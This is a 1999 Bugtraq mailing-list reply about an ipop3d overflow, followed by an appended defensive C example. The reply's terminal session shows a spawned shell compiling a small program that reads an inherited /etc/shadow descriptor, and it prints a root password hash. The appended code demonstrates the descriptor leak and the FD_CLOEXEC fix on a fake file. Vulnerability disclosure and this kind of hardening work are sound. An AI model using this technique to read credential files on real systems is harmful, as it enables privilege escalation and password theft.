[10139] in bugtraq
Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight
daemon@ATHENA.MIT.EDU (M.C.Mar)
Thu Apr 8 16:18:22 1999
Date: Thu, 8 Apr 1999 16:39:30 +0200
Reply-To: "M.C.Mar" <emsi@it.pl>
From: "M.C.Mar" <woloszyn@IT.PL>
X-To: Stefan Rompf <srompf@TELEMATION.DE>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <3.0.1.32.19990406195725.00718e68@telesun2.telemation.de>
On Tue, 6 Apr 1999, Stefan Rompf wrote:
> Hello Michal,
>
> At 01:41 07.03.99 +0100, you wrote:
>
> >Exploited overflow in ipop3d could be used to gain superuser access (the
> >only thing done by ipop3d is setuid+setgid, no seteuid/setreuid).
>
> Fortunately, you are wrong here. Quoting from the Solaris' setuid() manpage:
>
> If the effective user ID of the process calling setuid() is
> the super-user, the real, effective, and saved user IDs are
> set to the uid parameter.
>
> Linux behaves the same way, IMHO this is defined in POSIX.
>
But, (un)fortunately when exploiting ipop3d I found something like this:
Grabarz:~emsi# lsof -n | grep 1190
sh 1190 emsi cwd DIR 8,1 1024 2 /
sh 1190 emsi rtd DIR 8,1 1024 2 /
sh 1190 emsi txt REG 8,1 279352 16324 /bin/bash
sh 1190 emsi mem REG 8,1 78828 30629 /lib/ld-linux.so.1.9.5
sh 1190 emsi mem REG 8,1 11493 79564 /lib/libtermcap.so.2.0.8
sh 1190 emsi mem REG 8,1 605044 79566 /lib/libc.so.5.4.33
[...]
sh 1190 emsi 3r REG 8,1 598 24674 /etc/shadow
Shell spawned via ipop3d exploitation (no bonus -- no exploit core) inherits
the opened fd :)
So we may do something like this:
emsi:~emsi# telnet grabarz 110
Trying 192.168.0.19...
Connected to grabarz.
Escape character is '^]'.
+OK Grabarz POP3 3.3(20) w/IMAP2 client (Comments to MRC@CAC.Washington.EDU) at Fri, 9 Apr 1999 15:19:33 +0000 ( )
user emsi
+OK User name accepted, password please
pass qpqp01
id;
uid=1002(emsi) gid=100(users) groups=100(users)
: command not found
bash -i;
bash$ cd ~emsi
cd ~emsi
bash$
bash$ cat p.c
cat p.c
#include <stdio.h>   /* printf */
#include <unistd.h>  /* lseek, read */
char buf[255];       /* global, so zero-filled; not NUL-terminated if all 255 bytes are read */
int main(void) {
lseek(3,0,0);        /* fd 3 is the /etc/shadow descriptor inherited from ipop3d */
read(3,buf,255);
printf("Be my guest:\n%s\n",buf);
}
bash$
bash$ gcc p.c
gcc p.c
bash$
./a.out
Be my guest:
root:csKcGWMEUMGUs:10539:0:::::
halt:*:9797:0:::::
operator:*:9797:0:::::
shutdown:*:9797:0:::::
sync:*:9797:0:::::
bin:*:9797:0:::::
ftp:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
mail:*:9797:0:::::
postmaster:*:9797:0:::::
new=BF=A4=FE^
`
bash$
bash$
That's only an example... It proves that exploiting ipop3d could be useful
to obtain root (or any other account) access and that the vulnerability
should be fixed.
P.S.
Greetings Lam3rZ Group, 3Kombajd_do_czereśni testers and Lcamtuf (you lamer,
will you finally send me that txt you promised me? ;).
--
___________________________________________________________________________
M.C.Mar An NT server can be run by an idiot, and usually is. emsi@it.pl
"If you can't make it good, make it LOOK good." - Bill Gates
Maybe this isn't the place for it, but M$ programs, for instance, are a peculiar kind of monument to stupidity.
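The lsof output above shows the root cause from the defender's side: ipop3d opened /etc/shadow while still privileged and left the descriptor open while it went on to parse untrusted client input, so anything that later executed in that process inherited the file. The following C program is an added example (not code from the original post or from ipop3d) that reproduces the leak against a constructed stand-in file in /tmp and shows the mitigation: marking the descriptor close-on-exec with fcntl(FD_CLOEXEC) (or, better still, closing it as soon as the daemon is done reading). It assumes a POSIX system with /bin/sh and a head command that accepts -c; the function names simulate_daemon, fd_survives_exec and fd_is_cloexec are this example's own.

```c
/*
 * Added example, not from the original post: a daemon opens a sensitive file
 * (a constructed fake shadow line in /tmp), then execs a child the way an
 * injected shell would be started. Without FD_CLOEXEC the child can read the
 * inherited descriptor, exactly like fd 3 in the lsof listing above.
 */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Create a temp file holding one constructed (fake) shadow line. Returns 0 on success. */
static int create_secret_file(char *path, size_t pathlen) {
    snprintf(path, pathlen, "/tmp/fdleak-demo-%ld", (long)getpid());
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return -1;
    const char *line = "root:$6$constructed$notarealhash:10539:0:::::\n";
    ssize_t n = write(fd, line, strlen(line));
    close(fd);
    return n == (ssize_t)strlen(line) ? 0 : -1;
}

/* Defender's audit check: is this descriptor marked close-on-exec? */
int fd_is_cloexec(int fd) {
    int flags = fcntl(fd, F_GETFD);
    return flags >= 0 && (flags & FD_CLOEXEC) != 0;
}

/* Fork a child that execs /bin/sh and tries to read 4 bytes from the given
 * descriptor number. Returns 1 if the child received data (the fd crossed the
 * exec boundary), 0 if it received nothing, -1 on error. */
int fd_survives_exec(int fd) {
    int pipefd[2];
    if (pipe(pipefd) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char script[96];
        /* 'exec 2>/dev/null' silences the shell's "Bad file descriptor"
         * message when the redirection fails because the fd was closed on exec. */
        snprintf(script, sizeof script, "exec 2>/dev/null; head -c 4 <&%d", fd);
        dup2(pipefd[1], STDOUT_FILENO);
        close(pipefd[0]);
        close(pipefd[1]);
        execl("/bin/sh", "sh", "-c", script, (char *)NULL);
        _exit(127);
    }
    close(pipefd[1]);
    char buf[8] = {0};
    ssize_t n = read(pipefd[0], buf, sizeof buf - 1);
    close(pipefd[0]);
    int status;
    waitpid(pid, &status, 0);
    return n > 0 ? 1 : 0;
}

/* Simulate the daemon: open the secret, optionally harden the descriptor,
 * then spawn a child. Returns 1 if the child could read the secret, else 0. */
int simulate_daemon(int harden) {
    char path[64];
    if (create_secret_file(path, sizeof path) != 0) return -1;
    int fd = open(path, O_RDONLY);
    if (fd < 0) { unlink(path); return -1; }
    if (harden) {
        /* Mitigation: never let the descriptor cross an exec. Closing it as
         * soon as the privileged read is finished is the stronger fix. */
        fcntl(fd, F_SETFD, FD_CLOEXEC);
    }
    int leaked = fd_survives_exec(fd);
    close(fd);
    unlink(path);
    return leaked;
}

int main(void) {
    printf("unhardened daemon, child can read secret fd: %d\n", simulate_daemon(0));
    printf("FD_CLOEXEC daemon, child can read secret fd: %d\n", simulate_daemon(1));
    return 0;
}
```

The same F_GETFD check in fd_is_cloexec is what a code review or a startup self-test in a setuid daemon should apply to every descriptor it opened while privileged; on Linux, lsof -p or /proc/PID/fd gives the equivalent view from outside, which is how the post spotted fd 3.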